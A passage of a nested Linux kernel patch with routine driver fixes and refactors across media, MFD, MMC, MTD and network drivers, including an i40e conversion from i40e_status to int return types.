++++ b/drivers/media/platform/st/sti/bdisp/bdisp-v4l2.c
+@@ -1309,6 +1309,8 @@ static int bdisp_probe(struct platform_device *pdev)
+ 	init_waitqueue_head(&bdisp->irq_queue);
+ 	INIT_DELAYED_WORK(&bdisp->timeout_work, bdisp_irq_timeout);
+ 	bdisp->work_queue = create_workqueue(BDISP_NAME);
++	if (!bdisp->work_queue)
++		return -ENOMEM;
+ 
+ 	spin_lock_init(&bdisp->slock);
+ 	mutex_init(&bdisp->lock);
+diff --git a/drivers/media/rc/gpio-ir-recv.c b/drivers/media/rc/gpio-ir-recv.c
+index a56c844d7f816..16795e07dc103 100644
+--- a/drivers/media/rc/gpio-ir-recv.c
++++ b/drivers/media/rc/gpio-ir-recv.c
+@@ -107,6 +107,8 @@ static int gpio_ir_recv_probe(struct platform_device *pdev)
+ 		rcdev->map_name = RC_MAP_EMPTY;
+ 
+ 	gpio_dev->rcdev = rcdev;
++	if (of_property_read_bool(np, "wakeup-source"))
++		device_init_wakeup(dev, true);
+ 
+ 	rc = devm_rc_register_device(dev, rcdev);
+ 	if (rc < 0) {
+diff --git a/drivers/media/v4l2-core/v4l2-async.c b/drivers/media/v4l2-core/v4l2-async.c
+index 2f1b718a91893..008a2a3e312e0 100644
+--- a/drivers/media/v4l2-core/v4l2-async.c
++++ b/drivers/media/v4l2-core/v4l2-async.c
+@@ -414,7 +414,8 @@ static void v4l2_async_cleanup(struct v4l2_subdev *sd)
+ 
+ /* Unbind all sub-devices in the notifier tree. */
+ static void
+-v4l2_async_nf_unbind_all_subdevs(struct v4l2_async_notifier *notifier)
++v4l2_async_nf_unbind_all_subdevs(struct v4l2_async_notifier *notifier,
++				 bool readd)
+ {
+ 	struct v4l2_subdev *sd, *tmp;
+ 
+@@ -423,9 +424,11 @@ v4l2_async_nf_unbind_all_subdevs(struct v4l2_async_notifier *notifier)
+ 			v4l2_async_find_subdev_notifier(sd);
+ 
+ 		if (subdev_notifier)
+-			v4l2_async_nf_unbind_all_subdevs(subdev_notifier);
++			v4l2_async_nf_unbind_all_subdevs(subdev_notifier, true);
+ 
+ 		v4l2_async_nf_call_unbind(notifier, sd, sd->asd);
++		if (readd)
++			list_add_tail(&sd->asd->list, &notifier->waiting);
+ 		v4l2_async_cleanup(sd);
+ 
+ 		list_move(&sd->async_list, &subdev_list);
+@@ -557,7 +560,7 @@ err_unbind:
+ 	/*
+ 	 * On failure, unbind all sub-devices registered through this notifier.
+ 	 */
+-	v4l2_async_nf_unbind_all_subdevs(notifier);
++	v4l2_async_nf_unbind_all_subdevs(notifier, false);
+ 
+ err_unlock:
+ 	mutex_unlock(&list_lock);
+@@ -607,7 +610,7 @@ __v4l2_async_nf_unregister(struct v4l2_async_notifier *notifier)
+ 	if (!notifier || (!notifier->v4l2_dev && !notifier->sd))
+ 		return;
+ 
+-	v4l2_async_nf_unbind_all_subdevs(notifier);
++	v4l2_async_nf_unbind_all_subdevs(notifier, false);
+ 
+ 	notifier->sd = NULL;
+ 	notifier->v4l2_dev = NULL;
+@@ -805,7 +808,7 @@ err_unbind:
+ 	 */
+ 	subdev_notifier = v4l2_async_find_subdev_notifier(sd);
+ 	if (subdev_notifier)
+-		v4l2_async_nf_unbind_all_subdevs(subdev_notifier);
++		v4l2_async_nf_unbind_all_subdevs(subdev_notifier, false);
+ 
+ 	if (sd->asd)
+ 		v4l2_async_nf_call_unbind(notifier, sd, sd->asd);
+diff --git a/drivers/mfd/arizona-spi.c b/drivers/mfd/arizona-spi.c
+index 941b0267d09d4..5c4af05ed0440 100644
+--- a/drivers/mfd/arizona-spi.c
++++ b/drivers/mfd/arizona-spi.c
+@@ -277,6 +277,7 @@ static const struct of_device_id arizona_spi_of_match[] = {
+ 	{ .compatible = "cirrus,cs47l24", .data = (void *)CS47L24 },
+ 	{},
+ };
++MODULE_DEVICE_TABLE(of, arizona_spi_of_match);
+ #endif
+ 
+ static struct spi_driver arizona_spi_driver = {
+diff --git a/drivers/mfd/ocelot-spi.c b/drivers/mfd/ocelot-spi.c
+index 2ecd271de2fb9..85021f94e5874 100644
+--- a/drivers/mfd/ocelot-spi.c
++++ b/drivers/mfd/ocelot-spi.c
+@@ -130,6 +130,7 @@ static const struct regmap_config ocelot_spi_regmap_config = {
+ 
+ 	.write_flag_mask = 0x80,
+ 
++	.use_single_read = true,
+ 	.use_single_write = true,
+ 	.can_multi_write = false,
+ 
+diff --git a/drivers/mfd/tqmx86.c b/drivers/mfd/tqmx86.c
+index 7ae906ff8e353..fac02875fe7d9 100644
+--- a/drivers/mfd/tqmx86.c
++++ b/drivers/mfd/tqmx86.c
+@@ -16,8 +16,8 @@
+ #include <linux/platform_data/i2c-ocores.h>
+ #include <linux/platform_device.h>
+ 
+-#define TQMX86_IOBASE	0x160
+-#define TQMX86_IOSIZE	0x3f
++#define TQMX86_IOBASE	0x180
++#define TQMX86_IOSIZE	0x20
+ #define TQMX86_IOBASE_I2C	0x1a0
+ #define TQMX86_IOSIZE_I2C	0xa
+ #define TQMX86_IOBASE_WATCHDOG	0x18b
+@@ -25,14 +25,14 @@
+ #define TQMX86_IOBASE_GPIO	0x18d
+ #define TQMX86_IOSIZE_GPIO	0x4
+ 
+-#define TQMX86_REG_BOARD_ID	0x20
++#define TQMX86_REG_BOARD_ID	0x00
+ #define TQMX86_REG_BOARD_ID_E38M	1
+ #define TQMX86_REG_BOARD_ID_50UC	2
+ #define TQMX86_REG_BOARD_ID_E38C	3
+ #define TQMX86_REG_BOARD_ID_60EB	4
+-#define TQMX86_REG_BOARD_ID_E39M	5
+-#define TQMX86_REG_BOARD_ID_E39C	6
+-#define TQMX86_REG_BOARD_ID_E39x	7
++#define TQMX86_REG_BOARD_ID_E39MS	5
++#define TQMX86_REG_BOARD_ID_E39C1	6
++#define TQMX86_REG_BOARD_ID_E39C2	7
+ #define TQMX86_REG_BOARD_ID_70EB	8
+ #define TQMX86_REG_BOARD_ID_80UC	9
+ #define TQMX86_REG_BOARD_ID_110EB	11
+@@ -40,18 +40,18 @@
+ #define TQMX86_REG_BOARD_ID_E40S	13
+ #define TQMX86_REG_BOARD_ID_E40C1	14
+ #define TQMX86_REG_BOARD_ID_E40C2	15
+-#define TQMX86_REG_BOARD_REV	0x21
+-#define TQMX86_REG_IO_EXT_INT	0x26
++#define TQMX86_REG_BOARD_REV	0x01
++#define TQMX86_REG_IO_EXT_INT	0x06
+ #define TQMX86_REG_IO_EXT_INT_NONE		0
+ #define TQMX86_REG_IO_EXT_INT_7			1
+ #define TQMX86_REG_IO_EXT_INT_9			2
+ #define TQMX86_REG_IO_EXT_INT_12		3
+ #define TQMX86_REG_IO_EXT_INT_MASK		0x3
+ #define TQMX86_REG_IO_EXT_INT_GPIO_SHIFT	4
++#define TQMX86_REG_SAUC		0x17
+ 
+-#define TQMX86_REG_I2C_DETECT	0x47
++#define TQMX86_REG_I2C_DETECT	0x1a7
+ #define TQMX86_REG_I2C_DETECT_SOFT		0xa5
+-#define TQMX86_REG_I2C_INT_EN	0x49
+ 
+ static uint gpio_irq;
+ module_param(gpio_irq, uint, 0);
+@@ -111,7 +111,7 @@ static const struct mfd_cell tqmx86_devs[] = {
+ 	},
+ };
+ 
+-static const char *tqmx86_board_id_to_name(u8 board_id)
++static const char *tqmx86_board_id_to_name(u8 board_id, u8 sauc)
+ {
+ 	switch (board_id) {
+ 	case TQMX86_REG_BOARD_ID_E38M:
+@@ -122,12 +122,12 @@ static const char *tqmx86_board_id_to_name(u8 board_id)
+ 		return "TQMxE38C";
+ 	case TQMX86_REG_BOARD_ID_60EB:
+ 		return "TQMx60EB";
+-	case TQMX86_REG_BOARD_ID_E39M:
+-		return "TQMxE39M";
+-	case TQMX86_REG_BOARD_ID_E39C:
+-		return "TQMxE39C";
+-	case TQMX86_REG_BOARD_ID_E39x:
+-		return "TQMxE39x";
++	case TQMX86_REG_BOARD_ID_E39MS:
++		return (sauc == 0xff) ? "TQMxE39M" : "TQMxE39S";
++	case TQMX86_REG_BOARD_ID_E39C1:
++		return "TQMxE39C1";
++	case TQMX86_REG_BOARD_ID_E39C2:
++		return "TQMxE39C2";
+ 	case TQMX86_REG_BOARD_ID_70EB:
+ 		return "TQMx70EB";
+ 	case TQMX86_REG_BOARD_ID_80UC:
+@@ -160,9 +160,9 @@ static int tqmx86_board_id_to_clk_rate(struct device *dev, u8 board_id)
+ 	case TQMX86_REG_BOARD_ID_E40C1:
+ 	case TQMX86_REG_BOARD_ID_E40C2:
+ 		return 24000;
+-	case TQMX86_REG_BOARD_ID_E39M:
+-	case TQMX86_REG_BOARD_ID_E39C:
+-	case TQMX86_REG_BOARD_ID_E39x:
++	case TQMX86_REG_BOARD_ID_E39MS:
++	case TQMX86_REG_BOARD_ID_E39C1:
++	case TQMX86_REG_BOARD_ID_E39C2:
+ 		return 25000;
+ 	case TQMX86_REG_BOARD_ID_E38M:
+ 	case TQMX86_REG_BOARD_ID_E38C:
+@@ -176,7 +176,7 @@ static int tqmx86_board_id_to_clk_rate(struct device *dev, u8 board_id)
+ 
+ static int tqmx86_probe(struct platform_device *pdev)
+ {
+-	u8 board_id, rev, i2c_det, io_ext_int_val;
++	u8 board_id, sauc, rev, i2c_det, io_ext_int_val;
+ 	struct device *dev = &pdev->dev;
+ 	u8 gpio_irq_cfg, readback;
+ 	const char *board_name;
+@@ -206,14 +206,20 @@ static int tqmx86_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	board_id = ioread8(io_base + TQMX86_REG_BOARD_ID);
+-	board_name = tqmx86_board_id_to_name(board_id);
++	sauc = ioread8(io_base + TQMX86_REG_SAUC);
++	board_name = tqmx86_board_id_to_name(board_id, sauc);
+ 	rev = ioread8(io_base + TQMX86_REG_BOARD_REV);
+ 
+ 	dev_info(dev,
+ 		 "Found %s - Board ID %d, PCB Revision %d, PLD Revision %d\n",
+ 		 board_name, board_id, rev >> 4, rev & 0xf);
+ 
+-	i2c_det = ioread8(io_base + TQMX86_REG_I2C_DETECT);
++	/*
++	 * The I2C_DETECT register is in the range assigned to the I2C driver
++	 * later, so we don't extend TQMX86_IOSIZE. Use inb() for this one-off
++	 * access instead of ioport_map + unmap.
++	 */
++	i2c_det = inb(TQMX86_REG_I2C_DETECT);
+ 
+ 	if (gpio_irq_cfg) {
+ 		io_ext_int_val =
+diff --git a/drivers/misc/vmw_vmci/vmci_host.c b/drivers/misc/vmw_vmci/vmci_host.c
+index 857b9851402a6..abe79f6fd2a79 100644
+--- a/drivers/misc/vmw_vmci/vmci_host.c
++++ b/drivers/misc/vmw_vmci/vmci_host.c
+@@ -165,10 +165,16 @@ static int vmci_host_close(struct inode *inode, struct file *filp)
+ static __poll_t vmci_host_poll(struct file *filp, poll_table *wait)
+ {
+ 	struct vmci_host_dev *vmci_host_dev = filp->private_data;
+-	struct vmci_ctx *context = vmci_host_dev->context;
++	struct vmci_ctx *context;
+ 	__poll_t mask = 0;
+ 
+ 	if (vmci_host_dev->ct_type == VMCIOBJ_CONTEXT) {
++		/*
++		 * Read context only if ct_type == VMCIOBJ_CONTEXT to make
++		 * sure that context is initialized
++		 */
++		context = vmci_host_dev->context;
++
+ 		/* Check for VMCI calls to this VM context. */
+ 		if (wait)
+ 			poll_wait(filp, &context->host_context.wait_queue,
+diff --git a/drivers/mmc/host/sdhci-of-esdhc.c b/drivers/mmc/host/sdhci-of-esdhc.c
+index e0266638381d0..6ae68e379f7e3 100644
+--- a/drivers/mmc/host/sdhci-of-esdhc.c
++++ b/drivers/mmc/host/sdhci-of-esdhc.c
+@@ -126,6 +126,7 @@ static u32 esdhc_readl_fixup(struct sdhci_host *host,
+ 			return ret;
+ 		}
+ 	}
++
+ 	/*
+ 	 * The DAT[3:0] line signal levels and the CMD line signal level are
+ 	 * not compatible with standard SDHC register. The line signal levels
+@@ -137,6 +138,16 @@ static u32 esdhc_readl_fixup(struct sdhci_host *host,
+ 		ret = value & 0x000fffff;
+ 		ret |= (value >> 4) & SDHCI_DATA_LVL_MASK;
+ 		ret |= (value << 1) & SDHCI_CMD_LVL;
++
++		/*
++		 * Some controllers have unreliable Data Line Active
++		 * bit for commands with busy signal. This affects
++		 * Command Inhibit (data) bit. Just ignore it since
++		 * MMC core driver has already polled card status
++		 * with CMD13 after any command with busy siganl.
++		 */
++		if (esdhc->quirk_ignore_data_inhibit)
++			ret &= ~SDHCI_DATA_INHIBIT;
+ 		return ret;
+ 	}
+ 
+@@ -151,19 +162,6 @@ static u32 esdhc_readl_fixup(struct sdhci_host *host,
+ 		return ret;
+ 	}
+ 
+-	/*
+-	 * Some controllers have unreliable Data Line Active
+-	 * bit for commands with busy signal. This affects
+-	 * Command Inhibit (data) bit. Just ignore it since
+-	 * MMC core driver has already polled card status
+-	 * with CMD13 after any command with busy siganl.
+-	 */
+-	if ((spec_reg == SDHCI_PRESENT_STATE) &&
+-	(esdhc->quirk_ignore_data_inhibit == true)) {
+-		ret = value & ~SDHCI_DATA_INHIBIT;
+-		return ret;
+-	}
+-
+ 	ret = value;
+ 	return ret;
+ }
+diff --git a/drivers/mtd/mtdcore.c b/drivers/mtd/mtdcore.c
+index 686ada1a63e9a..24518e5e1b5e4 100644
+--- a/drivers/mtd/mtdcore.c
++++ b/drivers/mtd/mtdcore.c
+@@ -884,8 +884,8 @@ static struct nvmem_device *mtd_otp_nvmem_register(struct mtd_info *mtd,
+ 
+ 	/* OTP nvmem will be registered on the physical device */
+ 	config.dev = mtd->dev.parent;
+-	config.name = kasprintf(GFP_KERNEL, "%s-%s", dev_name(&mtd->dev), compatible);
+-	config.id = NVMEM_DEVID_NONE;
++	config.name = compatible;
++	config.id = NVMEM_DEVID_AUTO;
+ 	config.owner = THIS_MODULE;
+ 	config.type = NVMEM_TYPE_OTP;
+ 	config.root_only = true;
+@@ -901,7 +901,6 @@ static struct nvmem_device *mtd_otp_nvmem_register(struct mtd_info *mtd,
+ 		nvmem = NULL;
+ 
+ 	of_node_put(np);
+-	kfree(config.name);
+ 
+ 	return nvmem;
+ }
+@@ -936,6 +935,7 @@ static int mtd_nvmem_fact_otp_reg_read(void *priv, unsigned int offset,
+ 
+ static int mtd_otp_nvmem_add(struct mtd_info *mtd)
+ {
++	struct device *dev = mtd->dev.parent;
+ 	struct nvmem_device *nvmem;
+ 	ssize_t size;
+ 	int err;
+@@ -949,7 +949,7 @@ static int mtd_otp_nvmem_add(struct mtd_info *mtd)
+ 			nvmem = mtd_otp_nvmem_register(mtd, "user-otp", size,
+ 						       mtd_nvmem_user_otp_reg_read);
+ 			if (IS_ERR(nvmem)) {
+-				dev_err(&mtd->dev, "Failed to register OTP NVMEM device\n");
++				dev_err(dev, "Failed to register OTP NVMEM device\n");
+ 				return PTR_ERR(nvmem);
+ 			}
+ 			mtd->otp_user_nvmem = nvmem;
+@@ -967,7 +967,7 @@ static int mtd_otp_nvmem_add(struct mtd_info *mtd)
+ 			nvmem = mtd_otp_nvmem_register(mtd, "factory-otp", size,
+ 						       mtd_nvmem_fact_otp_reg_read);
+ 			if (IS_ERR(nvmem)) {
+-				dev_err(&mtd->dev, "Failed to register OTP NVMEM device\n");
++				dev_err(dev, "Failed to register OTP NVMEM device\n");
+ 				err = PTR_ERR(nvmem);
+ 				goto err;
+ 			}
+@@ -1019,10 +1019,14 @@ int mtd_device_parse_register(struct mtd_info *mtd, const char * const *types,
+ 
+ 	mtd_set_dev_defaults(mtd);
+ 
++	ret = mtd_otp_nvmem_add(mtd);
++	if (ret)
++		goto out;
++
+ 	if (IS_ENABLED(CONFIG_MTD_PARTITIONED_MASTER)) {
+ 		ret = add_mtd_device(mtd);
+ 		if (ret)
+-			return ret;
++			goto out;
+ 	}
+ 
+ 	/* Prefer parsed partitions over driver-provided fallback */
+@@ -1057,9 +1061,12 @@ int mtd_device_parse_register(struct mtd_info *mtd, const char * const *types,
+ 		register_reboot_notifier(&mtd->reboot_notifier);
+ 	}
+ 
+-	ret = mtd_otp_nvmem_add(mtd);
+-
+ out:
++	if (ret) {
++		nvmem_unregister(mtd->otp_user_nvmem);
++		nvmem_unregister(mtd->otp_factory_nvmem);
++	}
++
+ 	if (ret && device_is_registered(&mtd->dev))
+ 		del_mtd_device(mtd);
+ 
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index 75e694791d8d9..9a7bea365acb7 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -2696,6 +2696,7 @@ static int spi_nor_quad_enable(struct spi_nor *nor)
+ 
+ static int spi_nor_init(struct spi_nor *nor)
+ {
++	struct spi_nor_flash_parameter *params = nor->params;
+ 	int err;
+ 
+ 	err = spi_nor_octal_dtr_enable(nor, true);
+@@ -2737,9 +2738,10 @@ static int spi_nor_init(struct spi_nor *nor)
+ 		 */
+ 		WARN_ONCE(nor->flags & SNOR_F_BROKEN_RESET,
+ 			  "enabling reset hack; may not recover from unexpected reboots\n");
+-		err = nor->params->set_4byte_addr_mode(nor, true);
++		err = params->set_4byte_addr_mode(nor, true);
+ 		if (err && err != -ENOTSUPP)
+ 			return err;
++		params->addr_mode_nbytes = 4;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/mtd/ubi/eba.c b/drivers/mtd/ubi/eba.c
+index 09c408c45a621..4e1d80746b04b 100644
+--- a/drivers/mtd/ubi/eba.c
++++ b/drivers/mtd/ubi/eba.c
+@@ -946,7 +946,7 @@ static int try_write_vid_and_data(struct ubi_volume *vol, int lnum,
+ 				  int offset, int len)
+ {
+ 	struct ubi_device *ubi = vol->ubi;
+-	int pnum, opnum, err, vol_id = vol->vol_id;
++	int pnum, opnum, err, err2, vol_id = vol->vol_id;
+ 
+ 	pnum = ubi_wl_get_peb(ubi);
+ 	if (pnum < 0) {
+@@ -981,10 +981,19 @@ static int try_write_vid_and_data(struct ubi_volume *vol, int lnum,
+ out_put:
+ 	up_read(&ubi->fm_eba_sem);
+ 
+-	if (err && pnum >= 0)
+-		err = ubi_wl_put_peb(ubi, vol_id, lnum, pnum, 1);
+-	else if (!err && opnum >= 0)
+-		err = ubi_wl_put_peb(ubi, vol_id, lnum, opnum, 0);
++	if (err && pnum >= 0) {
++		err2 = ubi_wl_put_peb(ubi, vol_id, lnum, pnum, 1);
++		if (err2) {
++			ubi_warn(ubi, "failed to return physical eraseblock %d, error %d",
++				 pnum, err2);
++		}
++	} else if (!err && opnum >= 0) {
++		err2 = ubi_wl_put_peb(ubi, vol_id, lnum, opnum, 0);
++		if (err2) {
++			ubi_warn(ubi, "failed to return physical eraseblock %d, error %d",
++				 opnum, err2);
++		}
++	}
+ 
+ 	return err;
+ }
+diff --git a/drivers/net/dsa/qca/qca8k-8xxx.c b/drivers/net/dsa/qca/qca8k-8xxx.c
+index fbcd5c2b13aeb..7a6166a0c9bcc 100644
+--- a/drivers/net/dsa/qca/qca8k-8xxx.c
++++ b/drivers/net/dsa/qca/qca8k-8xxx.c
+@@ -1365,7 +1365,6 @@ static void qca8k_pcs_get_state(struct phylink_pcs *pcs,
+ 
+ 	state->link = !!(reg & QCA8K_PORT_STATUS_LINK_UP);
+ 	state->an_complete = state->link;
+-	state->an_enabled = !!(reg & QCA8K_PORT_STATUS_LINK_AUTO);
+ 	state->duplex = (reg & QCA8K_PORT_STATUS_DUPLEX) ? DUPLEX_FULL :
+ 							   DUPLEX_HALF;
+ 
+diff --git a/drivers/net/ethernet/amd/nmclan_cs.c b/drivers/net/ethernet/amd/nmclan_cs.c
+index 823a329a921f4..0dd391c84c138 100644
+--- a/drivers/net/ethernet/amd/nmclan_cs.c
++++ b/drivers/net/ethernet/amd/nmclan_cs.c
+@@ -651,7 +651,7 @@ static int nmclan_config(struct pcmcia_device *link)
+     } else {
+       pr_notice("mace id not found: %x %x should be 0x40 0x?9\n",
+ 		sig[0], sig[1]);
+-      return -ENODEV;
++      goto failed;
+     }
+   }
+ 
+diff --git a/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c b/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
+index d8fb7d4ebd51e..981cc32480474 100644
+--- a/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
++++ b/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
+@@ -283,7 +283,8 @@ static int dpaa_stop(struct net_device *net_dev)
+ {
+ 	struct mac_device *mac_dev;
+ 	struct dpaa_priv *priv;
+-	int i, err, error;
++	int i, error;
++	int err = 0;
+ 
+ 	priv = netdev_priv(net_dev);
+ 	mac_dev = priv->mac_dev;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e.h b/drivers/net/ethernet/intel/i40e/i40e.h
+index 9a60d6b207f7c..a81f918091ccf 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e.h
++++ b/drivers/net/ethernet/intel/i40e/i40e.h
+@@ -1286,9 +1286,9 @@ void i40e_ptp_stop(struct i40e_pf *pf);
+ int i40e_ptp_alloc_pins(struct i40e_pf *pf);
+ int i40e_update_adq_vsi_queues(struct i40e_vsi *vsi, int vsi_offset);
+ int i40e_is_vsi_uplink_mode_veb(struct i40e_vsi *vsi);
+-i40e_status i40e_get_partition_bw_setting(struct i40e_pf *pf);
+-i40e_status i40e_set_partition_bw_setting(struct i40e_pf *pf);
+-i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf);
++int i40e_get_partition_bw_setting(struct i40e_pf *pf);
++int i40e_set_partition_bw_setting(struct i40e_pf *pf);
++int i40e_commit_partition_bw_setting(struct i40e_pf *pf);
+ void i40e_print_link_message(struct i40e_vsi *vsi, bool isup);
+ 
+ void i40e_set_fec_in_flags(u8 fec_cfg, u32 *flags);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_adminq.c b/drivers/net/ethernet/intel/i40e/i40e_adminq.c
+index 42439f725aa43..86fac8f959bb0 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_adminq.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_adminq.c
+@@ -47,9 +47,9 @@ static void i40e_adminq_init_regs(struct i40e_hw *hw)
+  *  i40e_alloc_adminq_asq_ring - Allocate Admin Queue send rings
+  *  @hw: pointer to the hardware structure
+  **/
+-static i40e_status i40e_alloc_adminq_asq_ring(struct i40e_hw *hw)
++static int i40e_alloc_adminq_asq_ring(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
++	int ret_code;
+ 
+ 	ret_code = i40e_allocate_dma_mem(hw, &hw->aq.asq.desc_buf,
+ 					 i40e_mem_atq_ring,
+@@ -74,9 +74,9 @@ static i40e_status i40e_alloc_adminq_asq_ring(struct i40e_hw *hw)
+  *  i40e_alloc_adminq_arq_ring - Allocate Admin Queue receive rings
+  *  @hw: pointer to the hardware structure
+  **/
+-static i40e_status i40e_alloc_adminq_arq_ring(struct i40e_hw *hw)
++static int i40e_alloc_adminq_arq_ring(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
++	int ret_code;
+ 
+ 	ret_code = i40e_allocate_dma_mem(hw, &hw->aq.arq.desc_buf,
+ 					 i40e_mem_arq_ring,
+@@ -115,11 +115,11 @@ static void i40e_free_adminq_arq(struct i40e_hw *hw)
+  *  i40e_alloc_arq_bufs - Allocate pre-posted buffers for the receive queue
+  *  @hw: pointer to the hardware structure
+  **/
+-static i40e_status i40e_alloc_arq_bufs(struct i40e_hw *hw)
++static int i40e_alloc_arq_bufs(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
+ 	struct i40e_aq_desc *desc;
+ 	struct i40e_dma_mem *bi;
++	int ret_code;
+ 	int i;
+ 
+ 	/* We'll be allocating the buffer info memory first, then we can
+@@ -182,10 +182,10 @@ unwind_alloc_arq_bufs:
+  *  i40e_alloc_asq_bufs - Allocate empty buffer structs for the send queue
+  *  @hw: pointer to the hardware structure
+  **/
+-static i40e_status i40e_alloc_asq_bufs(struct i40e_hw *hw)
++static int i40e_alloc_asq_bufs(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
+ 	struct i40e_dma_mem *bi;
++	int ret_code;
+ 	int i;
+ 
+ 	/* No mapped memory needed yet, just the buffer info structures */
+@@ -266,9 +266,9 @@ static void i40e_free_asq_bufs(struct i40e_hw *hw)
+  *
+  *  Configure base address and length registers for the transmit queue
+  **/
+-static i40e_status i40e_config_asq_regs(struct i40e_hw *hw)
++static int i40e_config_asq_regs(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u32 reg = 0;
+ 
+ 	/* Clear Head and Tail */
+@@ -295,9 +295,9 @@ static i40e_status i40e_config_asq_regs(struct i40e_hw *hw)
+  *
+  * Configure base address and length registers for the receive (event queue)
+  **/
+-static i40e_status i40e_config_arq_regs(struct i40e_hw *hw)
++static int i40e_config_arq_regs(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u32 reg = 0;
+ 
+ 	/* Clear Head and Tail */
+@@ -334,9 +334,9 @@ static i40e_status i40e_config_arq_regs(struct i40e_hw *hw)
+  *  Do *NOT* hold the lock when calling this as the memory allocation routines
+  *  called are not going to be atomic context safe
+  **/
+-static i40e_status i40e_init_asq(struct i40e_hw *hw)
++static int i40e_init_asq(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (hw->aq.asq.count > 0) {
+ 		/* queue already initialized */
+@@ -393,9 +393,9 @@ init_adminq_exit:
+  *  Do *NOT* hold the lock when calling this as the memory allocation routines
+  *  called are not going to be atomic context safe
+  **/
+-static i40e_status i40e_init_arq(struct i40e_hw *hw)
++static int i40e_init_arq(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (hw->aq.arq.count > 0) {
+ 		/* queue already initialized */
+@@ -445,9 +445,9 @@ init_adminq_exit:
+  *
+  *  The main shutdown routine for the Admin Send Queue
+  **/
+-static i40e_status i40e_shutdown_asq(struct i40e_hw *hw)
++static int i40e_shutdown_asq(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	mutex_lock(&hw->aq.asq_mutex);
+ 
+@@ -479,9 +479,9 @@ shutdown_asq_out:
+  *
+  *  The main shutdown routine for the Admin Receive Queue
+  **/
+-static i40e_status i40e_shutdown_arq(struct i40e_hw *hw)
++static int i40e_shutdown_arq(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	mutex_lock(&hw->aq.arq_mutex);
+ 
+@@ -582,12 +582,12 @@ static void i40e_set_hw_flags(struct i40e_hw *hw)
+  *     - hw->aq.arq_buf_size
+  *     - hw->aq.asq_buf_size
+  **/
+-i40e_status i40e_init_adminq(struct i40e_hw *hw)
++int i40e_init_adminq(struct i40e_hw *hw)
+ {
+ 	u16 cfg_ptr, oem_hi, oem_lo;
+ 	u16 eetrack_lo, eetrack_hi;
+-	i40e_status ret_code;
+ 	int retry = 0;
++	int ret_code;
+ 
+ 	/* verify input for valid configuration */
+ 	if ((hw->aq.num_arq_entries == 0) ||
+@@ -780,7 +780,7 @@ static bool i40e_asq_done(struct i40e_hw *hw)
+  *  This is the main send command driver routine for the Admin Queue send
+  *  queue.  It runs the queue, cleans the queue, etc
+  **/
+-static i40e_status
++static int
+ i40e_asq_send_command_atomic_exec(struct i40e_hw *hw,
+ 				  struct i40e_aq_desc *desc,
+ 				  void *buff, /* can be NULL */
+@@ -788,12 +788,12 @@ i40e_asq_send_command_atomic_exec(struct i40e_hw *hw,
+ 				  struct i40e_asq_cmd_details *cmd_details,
+ 				  bool is_atomic_context)
+ {
+-	i40e_status status = 0;
+ 	struct i40e_dma_mem *dma_buff = NULL;
+ 	struct i40e_asq_cmd_details *details;
+ 	struct i40e_aq_desc *desc_on_ring;
+ 	bool cmd_completed = false;
+ 	u16  retval = 0;
++	int status = 0;
+ 	u32  val = 0;
+ 
+ 	if (hw->aq.asq.count == 0) {
+@@ -984,7 +984,7 @@ asq_send_command_error:
+  *  Acquires the lock and calls the main send command execution
+  *  routine.
+  **/
+-i40e_status
++int
+ i40e_asq_send_command_atomic(struct i40e_hw *hw,
+ 			     struct i40e_aq_desc *desc,
+ 			     void *buff, /* can be NULL */
+@@ -992,7 +992,7 @@ i40e_asq_send_command_atomic(struct i40e_hw *hw,
+ 			     struct i40e_asq_cmd_details *cmd_details,
+ 			     bool is_atomic_context)
+ {
+-	i40e_status status;
++	int status;
+ 
+ 	mutex_lock(&hw->aq.asq_mutex);
+ 	status = i40e_asq_send_command_atomic_exec(hw, desc, buff, buff_size,
+@@ -1003,7 +1003,7 @@ i40e_asq_send_command_atomic(struct i40e_hw *hw,
+ 	return status;
+ }
+ 
+-i40e_status
++int
+ i40e_asq_send_command(struct i40e_hw *hw, struct i40e_aq_desc *desc,
+ 		      void *buff, /* can be NULL */ u16  buff_size,
+ 		      struct i40e_asq_cmd_details *cmd_details)
+@@ -1026,7 +1026,7 @@ i40e_asq_send_command(struct i40e_hw *hw, struct i40e_aq_desc *desc,
+  *  routine. Returns the last Admin Queue status in aq_status
+  *  to avoid race conditions in access to hw->aq.asq_last_status.
+  **/
+-i40e_status
++int
+ i40e_asq_send_command_atomic_v2(struct i40e_hw *hw,
+ 				struct i40e_aq_desc *desc,
+ 				void *buff, /* can be NULL */
+@@ -1035,7 +1035,7 @@ i40e_asq_send_command_atomic_v2(struct i40e_hw *hw,
+ 				bool is_atomic_context,
+ 				enum i40e_admin_queue_err *aq_status)
+ {
+-	i40e_status status;
++	int status;
+ 
+ 	mutex_lock(&hw->aq.asq_mutex);
+ 	status = i40e_asq_send_command_atomic_exec(hw, desc, buff,
+@@ -1048,7 +1048,7 @@ i40e_asq_send_command_atomic_v2(struct i40e_hw *hw,
